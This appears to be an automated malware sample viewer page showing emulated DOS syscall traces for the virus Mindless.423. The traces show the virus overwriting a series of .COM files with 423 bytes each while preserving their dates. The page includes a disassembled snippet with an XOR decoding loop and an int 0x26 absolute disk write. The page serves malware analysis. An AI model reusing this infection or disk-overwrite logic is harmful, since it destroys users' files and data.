Sample viewer

vx.netlux.org/Virus.DOS.Mindless.423.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:49.964406677Z 42 PC: 12a57 | Get date 0x12a57: cmp al, 0
0x12a59: jne 0x12ab8
0x12a5b: mov ax, 0x3301
0x12a5e: xor dl, dl
0x12a60: int 0x21
0x12a62: mov cx, 0x44
0x12a65: mov si, 0x1fd
0x12a68: mov al, byte ptr [si]
0x12a6a: xor al, 1
0x12a6c: mov byte ptr [si], al
0x12a6e: inc si
0x12a6f: loop 0x12a68
0x12a71: cmp byte ptr [0x1f4], 0x1b
0x12a76: ja 0x12a8e
0x12a78: pushf
0x12a79: mov al, byte ptr [0x1f4]
0x12a7c: mov cx, word ptr [0x1f5]
0x12a80: xor dx, dx
0x12a82: mov bx, 0x1fd
0x12a85: int 0x26
2018-12-17T22:57:49.969272913Z 78 PC: 12af5 | Find first file
2018-12-17T22:57:49.976266338Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:49.982847127Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.000442304Z 61 PC: 12b0e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:57:50.009248934Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.010942103Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.018506951Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.02099654Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.029075954Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.032123866Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.040323897Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.051695762Z 61 PC: 12b0e | Open file (Filename = 'PRINT.COM')
2018-12-17T22:57:50.06208852Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.06460094Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.072462435Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.074662526Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.08414874Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.087461319Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.093720833Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.105053749Z 61 PC: 12b0e | Open file (Filename = 'HELLO.COM')
2018-12-17T22:57:50.112871289Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.114828013Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.122674667Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.125788735Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.134322232Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.137667466Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.15836611Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.169893227Z 61 PC: 12b0e | Open file (Filename = 'PHANG.COM')
2018-12-17T22:57:50.183646091Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.186151957Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.194431127Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.196407292Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.205644366Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.209041199Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.215824795Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.228656342Z 61 PC: 12b0e | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:57:50.237604173Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.239097683Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.247819364Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.249798672Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.258229613Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.261300585Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.26797983Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.279075243Z 61 PC: 12b0e | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:57:50.285319131Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.2881445Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.294452681Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.296071481Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.303954619Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.306977439Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.317633207Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.327879861Z 61 PC: 12b0e | Open file (Filename = 'PAH.COM')
2018-12-17T22:57:50.334353079Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.336301719Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.345353604Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.347205199Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.356133535Z 79 PC: 12b30 | Find next file
2018-12-17T22:57:50.359311368Z 67 PC: 12afd | Get or set file attributes
2018-12-17T22:57:50.366573451Z 67 PC: 12b06 | Get or set file attributes
2018-12-17T22:57:50.380829012Z 61 PC: 12b0e | Open file (Filename = 'TEST.COM')
2018-12-17T22:57:50.388163285Z 87 PC: 12b15 | Get or set file date and time
2018-12-17T22:57:50.390154465Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:57:50.397994109Z 87 PC: 12b28 | Get or set file date and time
2018-12-17T22:57:50.399666287Z 62 PC: 12b2c | Close file
2018-12-17T22:57:50.409656738Z 79 PC: 12b30 | Find next file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12684,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.381184364Z 42 PC: 12a57 | Get date 0x12a57: cmp al, 0
0x12a59: jne 0x12ab8
0x12a5b: mov ax, 0x3301
0x12a5e: xor dl, dl
0x12a60: int 0x21
0x12a62: mov cx, 0x44
0x12a65: mov si, 0x1fd
0x12a68: mov al, byte ptr [si]
0x12a6a: xor al, 1
0x12a6c: mov byte ptr [si], al
0x12a6e: inc si
0x12a6f: loop 0x12a68
0x12a71: cmp byte ptr [0x1f4], 0x1b
0x12a76: ja 0x12a8e
0x12a78: pushf
0x12a79: mov al, byte ptr [0x1f4]
0x12a7c: mov cx, word ptr [0x1f5]
0x12a80: xor dx, dx
0x12a82: mov bx, 0x1fd
0x12a85: int 0x26
2018-12-25T12:35:58.384301772Z 78 PC: 12af5 | Find first file
2018-12-25T12:35:58.391015267Z 67 PC: 12afd | Get or set file attributes
2018-12-25T12:35:58.396992195Z 67 PC: 12b06 | Get or set file attributes
2018-12-25T12:35:58.413921748Z 61 PC: 12b0e | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:35:58.418409695Z 87 PC: 12b15 | Get or set file date and time
2018-12-25T12:35:58.419867473Z 64 PC: 12b21 | Write file or device (Write 423 bytes on handle 5)
2018-12-25T12:35:58.428782574Z 87 PC: 12b28 | Get or set file date and time
2018-12-25T12:35:58.430922588Z 62 PC: 12b2c | Close file
2018-12-25T12:35:58.438763333Z 79 PC: 12b30 | Find next file
2018-12-25T12:35:58.441502239Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.448205148Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.459706305Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.466875343Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.468731937Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.479239685Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.480931092Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.489435132Z 79 PC: 12b30 | Find next file (See above)
2018-12-25T12:35:58.492681983Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.499824566Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.511404186Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.518619006Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.520137291Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.528004551Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.529588671Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.537378205Z 79 PC: 12b30 | Find next file (See above)
2018-12-25T12:35:58.540074092Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.543948044Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.550390922Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.554535408Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.556208516Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.560485014Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.561543086Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.56684412Z 79 PC: 12b30 | Find next file (See above)
2018-12-25T12:35:58.569552819Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.581336466Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.593807158Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.601258566Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.602866548Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.610556424Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.612103673Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.620200583Z 79 PC: 12b30 | Find next file (See above)
2018-12-25T12:35:58.624089745Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.630905757Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.644671682Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.649784203Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.65123528Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.655596303Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.657360151Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.668860176Z 79 PC: 12b30 | Find next file (See above)
2018-12-25T12:35:58.672203964Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.67862894Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.689955836Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.702608716Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.704739649Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.713818022Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.715701623Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.724070906Z 79 PC: 12b30 | Find next file (See above)
2018-12-25T12:35:58.728056296Z 67 PC: 12afd | Get or set file attributes (See above)
2018-12-25T12:35:58.734341355Z 67 PC: 12b06 | Get or set file attributes (See above)
2018-12-25T12:35:58.745136005Z 61 PC: 12b0e | Open file (See above)
2018-12-25T12:35:58.754056165Z 87 PC: 12b15 | Get or set file date and time (See above)
2018-12-25T12:35:58.756364765Z 64 PC: 12b21 | Write file or device (See above)
2018-12-25T12:35:58.768197821Z 87 PC: 12b28 | Get or set file date and time (See above)
2018-12-25T12:35:58.770678113Z 62 PC: 12b2c | Close file (See above)
2018-12-25T12:35:58.780472608Z 79 PC: 12b30 | Find next file (See above)

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12684,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:35:58.584761838Z 42 PC: 12a57 | Get date 0x12a57: cmp al, 0
0x12a59: jne 0x12ab8
0x12a5b: mov ax, 0x3301
0x12a5e: xor dl, dl
0x12a60: int 0x21
0x12a62: mov cx, 0x44
0x12a65: mov si, 0x1fd
0x12a68: mov al, byte ptr [si]
0x12a6a: xor al, 1
0x12a6c: mov byte ptr [si], al
0x12a6e: inc si
0x12a6f: loop 0x12a68
0x12a71: cmp byte ptr [0x1f4], 0x1b
0x12a76: ja 0x12a8e
0x12a78: pushf
0x12a79: mov al, byte ptr [0x1f4]
0x12a7c: mov cx, word ptr [0x1f5]
0x12a80: xor dx, dx
0x12a82: mov bx, 0x1fd
0x12a85: int 0x26
2018-12-25T12:35:58.588446251Z 51 PC: 12a62 | Get or set Ctrl-Break